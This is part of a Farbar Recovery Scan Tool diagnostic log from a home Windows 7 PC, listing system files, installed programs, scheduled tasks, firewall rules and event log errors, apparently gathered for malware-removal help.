2015-07-15 09:22 - 2015-07-01 21:30 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2015-07-15 09:22 - 2015-07-01 21:29 - 00665088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2015-07-15 09:22 - 2015-07-01 21:29 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2015-07-15 09:22 - 2015-07-01 21:29 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2015-07-15 09:22 - 2015-07-01 21:27 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2015-07-15 09:22 - 2015-07-01 21:26 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2015-07-15 09:22 - 2015-07-01 21:24 - 00686080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2015-07-15 09:22 - 2015-07-01 20:27 - 00159232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2015-07-15 09:22 - 2015-07-01 20:26 - 00290816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2015-07-15 09:22 - 2015-07-01 20:26 - 00129024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2015-07-15 09:22 - 2015-06-20 20:49 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-07-15 09:22 - 2015-06-20 20:48 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-07-15 09:22 - 2015-06-20 20:08 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-07-15 09:22 - 2015-06-20 19:26 - 02427392 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-07-15 09:22 - 2015-06-11 18:57 - 06131200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2015-07-15 09:22 - 2015-06-11 18:57 - 00856064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2015-07-15 09:22 - 2015-06-11 18:57 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2015-07-15 09:22 - 2015-06-11 18:56 - 07077376 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2015-07-15 09:22 - 2015-06-11 18:56 - 01057792 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2015-07-15 09:22 - 2015-06-11 18:56 - 00062976 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2015-07-15 09:22 - 2015-06-11 14:15 - 00429568 _____ (Microsoft Corporation) C:\Windows\system32\wksprt.exe
2015-07-15 09:22 - 2015-04-27 20:23 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2015-07-15 09:22 - 2015-04-27 20:23 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2015-07-15 09:22 - 2015-04-27 20:23 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2015-07-15 09:22 - 2015-04-27 20:23 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2015-07-15 09:22 - 2015-04-27 20:05 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2015-07-15 09:22 - 2015-04-27 20:04 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2015-07-15 09:22 - 2015-04-27 20:04 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2015-07-15 09:22 - 2015-04-27 20:04 - 00103936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2015-07-15 09:21 - 2015-06-15 22:50 - 00112064 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2015-07-15 09:21 - 2015-06-15 22:45 - 03242496 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2015-07-15 09:21 - 2015-06-15 22:45 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2015-07-15 09:21 - 2015-06-15 22:45 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2015-07-15 09:21 - 2015-06-15 22:45 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2015-07-15 09:21 - 2015-06-15 22:44 - 00128000 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2015-07-15 09:21 - 2015-06-15 22:43 - 02364416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2015-07-15 09:21 - 2015-06-15 22:43 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2015-07-15 09:21 - 2015-06-15 22:43 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2015-07-15 09:21 - 2015-06-15 22:42 - 00073216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2015-07-15 09:21 - 2015-06-15 22:42 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\msimsg.dll
2015-07-15 09:21 - 2015-06-15 22:37 - 00025088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimsg.dll
2015-07-14 11:14 - 2015-07-14 11:16 - 00000000 ____D C:\Users\Mom\Downloads\Salvador 1986

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-08-11 23:09 - 2014-05-24 12:46 - 01724163 _____ C:\Windows\WindowsUpdate.log
2015-08-11 23:04 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-08-11 23:04 - 2009-07-14 05:51 - 00099876 _____ C:\Windows\setupact.log
2015-08-11 22:48 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-08-11 22:48 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-08-11 22:41 - 2014-10-21 07:57 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2015-08-11 20:59 - 2014-11-13 21:47 - 00000000 __SHD C:\Users\Mom\AppData\Local\EmieBrowserModeList
2015-08-11 20:59 - 2014-06-24 08:31 - 00000000 __SHD C:\Users\Mom\AppData\Local\EmieUserList
2015-08-11 20:59 - 2014-06-24 08:31 - 00000000 __SHD C:\Users\Mom\AppData\Local\EmieSiteList
2015-08-11 20:41 - 2014-10-21 07:57 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2015-08-11 20:41 - 2014-09-18 13:14 - 00778440 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-08-11 20:41 - 2014-09-18 13:14 - 00142536 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-08-09 20:04 - 2014-05-24 16:38 - 00000000 ____D C:\Users\Mom\AppData\Roaming\Skype
2015-08-09 17:42 - 2009-07-14 06:13 - 00781790 _____ C:\Windows\system32\PerfStringBackup.INI
2015-08-08 21:08 - 2014-05-25 18:32 - 00000000 ____D C:\Users\Mom\AppData\Roaming\uTorrent
2015-08-07 07:51 - 2014-07-15 10:23 - 00000000 ____D C:\Users\Mom\Downloads\Simon Schama History of Britain
2015-08-04 15:29 - 2009-07-14 06:08 - 00032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2015-08-03 13:12 - 2014-05-24 16:11 - 00000000 ____D C:\Users\Mom\AppData\Local\Google
2015-08-01 08:38 - 2015-07-10 14:39 - 00000000 ___HD C:\$Windows.~BT
2015-08-01 08:23 - 2014-05-24 21:42 - 00000000 ____D C:\Windows\Panther
2015-07-28 09:49 - 2014-05-26 17:59 - 00000000 ___SD C:\Windows\system32\CompatTel
2015-07-27 12:35 - 2015-06-04 08:25 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-07-27 12:35 - 2014-05-27 22:36 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-07-27 12:35 - 2014-05-24 15:53 - 00306544 _____ C:\Windows\PFRO.log
2015-07-26 23:23 - 2014-05-25 19:59 - 00000000 ____D C:\Users\Mom\AppData\Roaming\vlc
2015-07-25 08:10 - 2015-04-04 12:42 - 00000000 ___SD C:\Windows\system32\GWX
2015-07-21 16:53 - 2014-05-24 16:22 - 00000000 ____D C:\ProgramData\Skype
2015-07-21 16:43 - 2009-07-14 05:45 - 00408216 _____ C:\Windows\system32\FNTCACHE.DAT
2015-07-20 15:56 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\system32\NDF
2015-07-17 09:45 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\rescache
2015-07-16 23:21 - 2015-04-04 12:42 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-07-16 22:53 - 2014-05-24 16:13 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-07-16 22:53 - 2014-05-24 16:13 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-16 22:53 - 2014-05-24 16:13 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-16 22:53 - 2014-05-24 16:13 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-15 18:01 - 2014-12-10 22:50 - 00000000 ____D C:\Windows\system32\appraiser
2015-07-15 18:01 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\PolicyDefinitions
2015-07-15 10:13 - 2014-06-22 14:13 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-07-15 10:04 - 2014-05-24 13:19 - 00000000 ____D C:\Windows\system32\MRT
2015-07-15 08:48 - 2014-06-14 13:19 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2015-07-15 08:45 - 2014-12-27 15:47 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task

==================== Files in the root of some directories =======

2014-08-15 10:12 - 2014-08-15 10:12 - 0000057 _____ () C:\ProgramData\Ament.ini

Some files in TEMP:
====================
C:\Users\Mom\AppData\Local\Temp\avgnt.exe
C:\Users\Mom\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpgmql4v.dll
C:\Users\Mom\AppData\Local\Temp\jre-7u65-windows-i586-iftw.exe
C:\Users\Mom\AppData\Local\Temp\jre-8u31-windows-au.exe
C:\Users\Mom\AppData\Local\Temp\ose00000.exe
C:\Users\Mom\AppData\Local\Temp\Quarantine.exe
C:\Users\Mom\AppData\Local\Temp\sqlite3.dll
C:\Users\Mom\AppData\Local\Temp\vlc-2.1.5-win32.exe


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-08-08 22:24

==================== End of log ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version:11-08-2015 02
Ran by Mom (2015-08-11 23:15:22)
Running from C:\Users\Mom\Downloads
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-924763536-93737856-2869661127-500 - Administrator - Disabled)
Guest (S-1-5-21-924763536-93737856-2869661127-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-924763536-93737856-2869661127-1002 - Limited - Enabled)
Mom (S-1-5-21-924763536-93737856-2869661127-1000 - Administrator - Enabled) => C:\Users\Mom

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.1.151 - Adobe Systems, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 44.0.2403.130 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.28.1 - Google Inc.) Hidden
HP Photosmart 5510 series Basic Device Software (HKLM\...\{CFF43B48-42A1-4967-9506-7E341BBD075F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 39.0 (x86 en-GB) (HKLM-x32\...\Mozilla Firefox 39.0 (x86 en-GB)) (Version: 39.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 38.0.1 - Mozilla)
Mozilla Thunderbird 31.7.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 31.7.0 (x86 en-US)) (Version: 31.7.0 - Mozilla)
PDF Split And Merge Basic (HKLM\...\{28336922-26D1-4638-B4D7-790A7F8F922E}) (Version: 2.2.3 - Andrea Vacondio)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Skype™ 7.7 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.7.102 - Skype Technologies S.A.)
Soda PDF 6 View Module (x32 Version: 6.3.8.17473 - LULU Software Limited) Hidden
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Restore Points =========================

07-08-2015 13:33:25 Windows Update
08-08-2015 08:04:32 Windows Update
08-08-2015 09:13:47 Windows Update
09-08-2015 00:15:28 Windows Update
09-08-2015 19:27:41 Windows Update
09-08-2015 20:58:19 Windows Update

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 03:34 - 2009-06-10 22:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {330E5B53-B2AC-4650-B49C-E9481ADB4B06} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-24] (Google Inc.)
Task: {6E0FCAF8-92D8-43AF-86C9-95C14FF83A80} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-24] (Google Inc.)
Task: {A74A13A6-369A-4808-815C-5DB755541A80} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-07-07] (Adobe Systems Incorporated)
Task: {E2CD0FD8-B65F-45AF-A799-B9710670F741} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-08-11] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (Whitelisted) ==============

2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2012-01-10 21:12 - 2012-01-10 21:12 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:45 - 2010-10-20 15:45 - 08801120 _____ () C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2015-08-06 07:31 - 2015-07-31 07:19 - 01405768 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.130\libglesv2.dll
2015-08-06 07:31 - 2015-07-31 07:19 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\44.0.2403.130\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-924763536-93737856-2869661127-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Mom\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 194.168.4.100 - 194.168.8.100
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: ehRecvr => 3
MSCONFIG\Services: ehSched => 3
MSCONFIG\Services: Fax => 3
MSCONFIG\Services: idsvc => 3
MSCONFIG\Services: LULU Software CrashHandler => 3
MSCONFIG\Services: SCardSvr => 3
MSCONFIG\Services: SCPolicySvc => 3
MSCONFIG\Services: Soda PDF 6 => 3
MSCONFIG\Services: TabletInputService => 3
MSCONFIG\Services: WMPNetworkSvc => 2
MSCONFIG\Services: WPCSvc => 3
MSCONFIG\startupfolder: C:^Users^Mom^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Mom^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2010 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2010 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: Facebook Update => "C:\Users\Mom\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{5E0C6FF5-AA8A-4452-86E4-8B5C86D10E97}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{694FC7B7-0568-465B-A863-EC1D4891024F}] => (Allow) C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{B6F5BB14-10E2-42CF-A707-8FC453F48E66}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [UDP Query User{61DC722D-2674-4CB4-A19C-7E4D6A48C716}C:\windows\kmsemulator.exe] => (Allow) C:\windows\kmsemulator.exe
FirewallRules: [{8FFD5BB0-40B7-40C4-B6A8-8482A65AC3E7}] => (Allow) C:\Program Files\HP\HP Photosmart 5510 series\Bin\DeviceSetup.exe
FirewallRules: [{11A4EA4E-CE5D-4B13-A7B5-08248892564B}] => (Allow) C:\Program Files\HP\HP Photosmart 5510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{15D50127-5C56-4510-882C-BC246926743C}] => (Allow) C:\Program Files\HP\HP Photosmart 5510 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{97EA1064-EB43-41E8-B48B-EBF28046525A}] => (Allow) C:\Users\Mom\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{12668E68-B709-49C5-9E77-793A540FD51B}] => (Allow) C:\Users\Mom\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{A8B4D910-9FFD-4BF5-B9B4-18506BC5B9B1}C:\users\mom\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\mom\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{E12793DF-77E6-4F0A-83EE-E53F72C89071}C:\users\mom\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\mom\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{5720D434-2F44-4AC0-89DA-8DC2E292D340}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A0771DDC-2866-4B2F-B5F9-B1ABE1C297D4}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AED023D9-7606-4DA6-9957-E4B49634D304}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{A0AF53C4-F663-449F-9D10-E4DCAB57C230}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============

Name: MpKsl958ccaaf
Description: MpKsl958ccaaf
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: MpKsl958ccaaf
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Event log errors: =========================

Application errors:
==================
Error: (08/03/2015 07:43:15 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program firefox.exe version 39.0.0.5659 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: ae0

Start Time: 01d0cdaf22533202

Termination Time: 40

Application Path: C:\Program Files (x86)\Mozilla Firefox\firefox.exe

Report Id: a2b0bf1a-39aa-11e5-9c72-705ab677b1a1

Error: (07/29/2015 07:32:10 AM) (Source: ESENT) (EventID: 412) (User: )
Description: taskhost (1568) WebCacheLocal: Unable to read the header of logfile C:\Users\Mom\AppData\Local\Microsoft\Windows\WebCache\V01.log. Error -501.

Error: (07/29/2015 07:32:10 AM) (Source: ESENT) (EventID: 412) (User: )
Description: taskhost (1568) WebCacheLocal: Unable to read the header of logfile C:\Users\Mom\AppData\Local\Microsoft\Windows\WebCache\V01.log. Error -501.

Error: (07/26/2015 12:17:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: javaw.exe, version: 8.0.31.13, time stamp: 0x54925fd3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000092
Fault offset: 0x0125287a
Faulting process id: 0x1190
Faulting application start time: 0xjavaw.exe0
Faulting application path: javaw.exe1
Faulting module path: javaw.exe2
Report Id: javaw.exe3

Error: (07/06/2015 08:52:56 PM) (Source: MsiInstaller) (EventID: 11721) (User: Savage)
Description: Product: Java 8 Update 31 -- Error 1721. There is a problem with this Windows Installer package. A program required for this install to complete could not be run. Contact your support personnel or package vendor. Action: installexe, location: C:\Windows\Installer\MSIE4C6.tmp, command: INSTALLDIR="C:\Program Files (x86)\Java\jre1.8.0_31\\" REPAIRMODE=1

Error: (07/03/2015 09:50:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program uTorrent.exe version 3.4.3.40298 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: ac8

Start Time: 01d0b5bc80f1a9c6

Termination Time: 30

Application Path: C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe

Report Id: 10c1ae94-21c5-11e5-9def-705ab677b1a1

Error: (06/28/2015 08:00:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: javaw.exe, version: 8.0.31.13, time stamp: 0x54925fd3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc000008e
Fault offset: 0x1500287a
Faulting process id: 0x148c
Faulting application start time: 0xjavaw.exe0
Faulting application path: javaw.exe1
Faulting module path: javaw.exe2
Report Id: javaw.exe3

Error: (06/28/2015 07:29:50 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Skype.exe version 7.5.0.102 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: bb4

Start Time: 01d0b1d02f0a2726

Termination Time: 31

Application Path: C:\Program Files (x86)\Skype\Phone\Skype.exe

Report Id: a3dfe66a-1dc3-11e5-9af1-705ab677b1a1

Error: (06/25/2015 07:41:15 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program uTorrent.exe version 3.4.3.40298 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: b74

Start Time: 01d0af6515faa147

Termination Time: 30

Application Path: C:\Users\Mom\AppData\Roaming\uTorrent\uTorrent.exe

Report Id: b632200e-1b69-11e5-8632-705ab677b1a1

Error: (06/25/2015 05:45:41 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program thunderbird.exe version 31.7.0.5605 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: f64

Start Time: 01d0af6539342183

Termination Time: 40

Application Path: C:\Program Files (x86)\Mozilla Thunderbird\thunderbird.exe

Report Id: 8832c5c8-1b59-11e5-8632-705ab677b1a1


System errors:
=============
Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:15:33 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (08/11/2015 11:15:32 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

